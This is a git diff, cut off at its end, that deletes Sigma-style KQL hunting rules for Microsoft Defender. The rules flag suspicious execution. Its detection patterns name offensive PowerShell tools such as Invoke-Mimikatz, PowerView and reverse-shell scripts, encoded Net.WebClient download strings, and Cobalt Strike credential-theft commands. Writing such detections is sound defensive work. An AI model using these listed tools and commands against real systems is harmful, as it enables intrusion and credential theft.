FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql b/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql deleted file mode 100644 index 856b527b..00000000 --- a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/12 -// Level: medium -// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql deleted file mode 100644 index 49fbaa43..00000000 --- a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. -// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql b/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql deleted file mode 100644 index ec2bd99f..00000000 --- a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: medium -// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/Execution/Microsoft_Workflow_Compiler_Execution.kql b/Execution/Microsoft_Workflow_Compiler_Execution.kql deleted file mode 100644 index fc3958d8..00000000 --- a/Execution/Microsoft_Workflow_Compiler_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, frack113 -// Date: 2019/01/16 -// Level: medium -// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. -// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql deleted file mode 100644 index 3f152c7d..00000000 --- a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) -// Date: 2022/08/14 -// Level: high -// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml") \ No newline at end of file diff --git a/Execution/Net_WebClient_Casing_Anomalies.kql b/Execution/Net_WebClient_Casing_Anomalies.kql deleted file mode 100644 index f0456bb4..00000000 --- a/Execution/Net_WebClient_Casing_Anomalies.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/24 -// Level: high -// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql b/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql deleted file mode 100644 index 43a0fa9b..00000000 --- a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/04/14 -// Level: high -// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". -// Tags: attack.execution, attack.t1203 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe" \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql deleted file mode 100644 index fece3237..00000000 --- a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects a network connection initiated by "Regsvr32.exe" -// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql deleted file mode 100644 index 8e765072..00000000 --- a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: EagleEye Team -// Date: 2020/05/14 -// Level: high -// Description: Detects a network connection that is initiated by the "notepad.exe" process. -This might be a sign of process injection from a beacon process or something similar. -Notepad rarely initiates a network communication except when printing documents for example. - -// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/Execution/New_Application_in_AppCompat.kql b/Execution/New_Application_in_AppCompat.kql deleted file mode 100644 index 65adc423..00000000 --- a/Execution/New_Application_in_AppCompat.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: informational -// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. -// Tags: attack.execution, attack.t1204.002 -DeviceRegistryEvents -| where RegistryKey contains "\\AppCompatFlags\\Compatibility Assistant\\Store" \ No newline at end of file diff --git a/Execution/New_Process_Created_Via_Wmic.EXE.kql b/Execution/New_Process_Created_Via_Wmic.EXE.kql deleted file mode 100644 index 77159755..00000000 --- a/Execution/New_Process_Created_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community -// Date: 2019/01/16 -// Level: medium -// Description: Detects new process creation using WMIC via the "process call create" flag -// Tags: attack.execution, attack.t1047, car.2016-03-002 -DeviceProcessEvents -| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql b/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql deleted file mode 100644 index d02933f8..00000000 --- a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/15 -// Level: medium -// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe") \ No newline at end of file diff --git a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql b/Execution/Non_Interactive_PowerShell_Process_Spawned.kql deleted file mode 100644 index f604fb6e..00000000 --- a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) -// Date: 2019/09/12 -// Level: low -// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe")))) \ No newline at end of file diff --git a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql b/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql deleted file mode 100644 index 421decbc..00000000 --- a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton -// Date: 2021/11/10 -// Level: medium -// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. -This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. -This rule will require an initial baseline and tuning that is specific to your organization. - -// Tags: attack.execution, attack.t1203 -DeviceNetworkEvents -| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql deleted file mode 100644 index f62f88b2..00000000 --- a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: _pete_0, TheDFIRReport -// Date: 2022/05/06 -// Level: high -// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell -// Tags: attack.execution, attack.t1059.003, stp.1u -DeviceProcessEvents -| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql deleted file mode 100644 index ec317b49..00000000 --- a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: _pete_0, TheDFIRReport -// Date: 2022/05/06 -// Level: high -// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql 